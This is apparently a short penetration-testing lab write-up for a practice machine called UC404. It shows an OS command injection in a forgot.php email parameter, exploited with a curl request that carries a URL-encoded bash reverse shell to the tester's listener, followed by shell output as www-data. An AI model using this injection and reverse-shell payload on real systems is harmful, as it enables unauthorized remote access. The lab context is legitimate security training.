OS Command Injection
The target web application is hosting a custom web application at the /under_construction endpoint that suffers from a OS command injection vulnerability at the email parameter of the forgot.php file. It has been identified and confirmed via sending a GET request. The termination character is &(%26)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/uc404]
└─$ curl -s "http://$IP/under_construction/forgot.php?email=%26bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.163%2F9999%200%3E%261%22"Sending a URL-encoded reverse shell payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/uc404]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.163] from (UNKNOWN) [192.168.125.109] 57020
bash: cannot set terminal process group (571): Inappropriate ioctl for device
bash: no job control in this shell
www-data@UC404:/var/www/html/under_construction$ whoami
whoami
www-data
www-data@UC404:/var/www/html/under_construction$ hostname
hostname
UC404
www-data@UC404:/var/www/html/under_construction$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:dd:02 brd ff:ff:ff:ff:ff:ff
inet 192.168.125.109/24 brd 192.168.125.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via OS command injection